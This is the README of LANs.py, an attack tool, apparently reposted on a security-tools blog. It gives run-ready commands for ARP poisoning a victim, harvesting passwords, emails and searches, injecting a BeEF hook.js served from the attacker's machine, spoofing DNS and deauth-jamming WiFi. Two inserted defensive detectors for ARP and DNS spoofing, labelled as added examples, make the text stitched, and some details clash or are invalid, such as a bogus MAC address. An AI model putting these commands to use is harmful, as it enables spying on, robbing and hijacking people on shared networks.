LANs.py - Inject Code, Jam Wifi, And Spy on Wifi Users
LANs.py
- Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.
- Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays most of the interesting bits of their traffic and can inject custom HTML into pages they visit. Cleans up after itself.
- Can also be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based on the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.
Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.
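From the defender's side, the targeted poisoning described above is visible as address rebinding: the router's and victim's IPs suddenly resolve to the MAC of 192.168.0.5, and flip back on cleanup. The following is an added example, not part of LANs.py; the router address 192.168.0.1, the MAC addresses and the function name are assumptions, and the observations are constructed.

```python
# Added example: passive ARP-poisoning detector over (timestamp, IP, MAC)
# tuples taken from ARP replies. The sample below is constructed.
SAMPLE = [
    (0.0, "192.168.0.1",  "aa:aa:aa:00:00:01"),  # router (assumed address)
    (1.0, "192.168.0.10", "bb:bb:bb:00:00:10"),  # victim
    (2.0, "192.168.0.5",  "cc:cc:cc:00:00:05"),  # attacking machine
    (5.0, "192.168.0.1",  "cc:cc:cc:00:00:05"),  # router IP claimed by .5's MAC
    (5.1, "192.168.0.10", "cc:cc:cc:00:00:05"),  # victim IP claimed by .5's MAC
    (9.0, "192.168.0.1",  "aa:aa:aa:00:00:01"),  # bindings restored on cleanup
    (9.1, "192.168.0.10", "bb:bb:bb:00:00:10"),
]

def detect_arp_poisoning(observations):
    """Return alerts for IP->MAC rebinding and for one MAC claiming several IPs.

    The baseline is trust-on-first-use: if poisoning began before monitoring
    started, seed `baseline` from a known-good inventory instead.
    """
    baseline, current, alerts = {}, {}, []
    for ts, ip, mac in observations:
        mac = mac.lower()
        baseline.setdefault(ip, mac)
        previous = current.get(ip)
        current[ip] = mac
        if mac == previous:
            continue  # repeated claim, nothing new to report
        if mac != baseline[ip]:
            alerts.append((ts, "rebind", ip, mac))
            # A MAC answering for several IPs (e.g. router and victim at once)
            # is the signature of a man-in-the-middle position.
            claimed = sorted(i for i, m in current.items() if m == mac)
            if len(claimed) > 1:
                alerts.append((ts, "multi-ip", mac, tuple(claimed)))
        elif previous is not None:
            alerts.append((ts, "restored", ip, mac))
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE):
        print(alert)
```

Static ARP entries for the gateway, or dynamic ARP inspection on the switch, prevent the rebinding that this detector only reports.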
All options:
python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
[-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
[-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
[-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
[-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
[--directedonly] [--accesspoint ACCESSPOINT]
Usage
Common usage:
python LANs.py -u -p
Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received.
Running LANs.py without arguments will give you the list of active targets and, upon selecting one, it will act as a simple ARP spoofer.
Another common usage:
python LANs.py -u -p -d -ip 192.168.0.10
-ip: target this IP address and skip the active targeting at the beginning
HTML injection:
python LANs.py -b http://192.168.0.5:3000/hook.js
<script> tags so you can really enter any location of a JavaScript file. Attempts to insert it after the first tag found in the page's HTML.
python LANs.py -c '<title>Owned.</title>'
<head> tag and failing that, injects prior to the first </head> tag. This example will change the page title to 'Owned.'
Read from pcap:
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
DNS spoofing:
python LANs.py -a -r 80.87.128.67
python LANs.py -dns eff.org
Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.
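Both redirect behaviours leave a pattern in the answers a client receives: a public name resolving to an address on the local subnet (the default redirect), or many unrelated domains resolving to one address (-a with -r). The following is an added detection example, not part of LANs.py; the /24 subnet, the internal suffixes, the threshold and the sample answers are assumptions constructed for illustration.

```python
# Added example: flag suspicious DNS A-record answers seen by a client.
import ipaddress
from collections import defaultdict

LOCAL_NET = ipaddress.ip_network("192.168.0.0/24")  # assumed LAN

# Constructed sample of (queried name, answered address) pairs.
SAMPLE = [
    ("eff.org", "192.168.0.5"),
    ("www.eff.org", "192.168.0.5"),
    ("example.com", "80.87.128.67"),
    ("example.net", "80.87.128.67"),
    ("example.org", "80.87.128.67"),
    ("printer.lan", "192.168.0.20"),   # legitimate internal name
]

def base_domain(name):
    # Naive "last two labels" grouping; not public-suffix aware.
    return ".".join(name.rstrip(".").lower().split(".")[-2:])

def detect_dns_spoofing(answers, local_net=LOCAL_NET,
                        internal_suffixes=("lan", "local"), fanout=3):
    """Return ('lan-answer', name, ip) and ('fanout', ip, domains) alerts."""
    alerts, by_ip = [], defaultdict(set)
    for name, ip in answers:
        dom = base_domain(name)
        if dom.split(".")[-1] in internal_suffixes:
            continue  # internal names are expected to resolve locally
        by_ip[ip].add(dom)
        if ipaddress.ip_address(ip) in local_net:
            alerts.append(("lan-answer", name, ip))
    for ip, doms in by_ip.items():
        # Heuristic: shared hosting and CDNs can also trigger this, so tune
        # the threshold or allow-list known provider ranges.
        if len(doms) >= fanout:
            alerts.append(("fanout", ip, tuple(sorted(doms))))
    return alerts

if __name__ == "__main__":
    for alert in detect_dns_spoofing(SAMPLE):
        print(alert)
```

DNSSEC validation or an encrypted resolver channel (DoT/DoH) removes the attacker's ability to forge these answers in the first place.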
Most aggressive usage:
python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10
Jam all WiFi networks:
python LANs.py --jam
Jam just one access point (router):
python LANs.py --jam --accesspoint 01:MA:C0:AD:DY
All options:
Normal Usage:
- -b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js
- -c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject
- -d: open an xterm with driftnet to see all images they view
- -dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com
- -a: spoof the response to every DNS request the victim makes, effectively creating a captive portal page; -r option can be used with this
- -r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN
- -u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
- -i INTERFACE: specify interface; default is first interface in ip route, eg: -i wlan0
- -ip: target this IP address
- -n: performs a quick nmap scan of the target
- -na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt
- -p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received
- -pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument
- -rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it
- -rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it
- -v: show verbose URLs which do not truncate at 150 characters like -u
- --jam: jam all or some 2.4GHz wireless access points and clients in range; use arguments below in conjunction with this argument if necessary
- -s MAC_Address_to_skip: Specify a MAC address to skip deauthing. Example: -s 00:11:BB:33:44:AA
- -ch CHANNEL: Limit wifijammer to single channel
- -m MAXIMUM: Maximum number of clients to deauth. Use if moving around so as to prevent deauthing client/AP pairs outside of current range.
- -no: Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -no
- -t TIME_INTERVAL: Time between each deauth packet. Default is maximum. If you see scapy errors like 'no buffer space' try: -t .00001
- --packets NUMBER: Number of packets to send in each deauth burst. Default is 1 packet.
- --directedonly: Don't send deauth packets to the broadcast address of APs and only send to client/AP pairs
- --accesspoint ROUTER_MAC: Enter the MAC address of a specific AP to target.
Clean up
Upon receiving a Ctrl-C:
- Turns off IP forwarding
- Flushes iptables firewall
- Individually restores the router and victim's ARP tables
Reviewed by Zion3R on 6:17 PM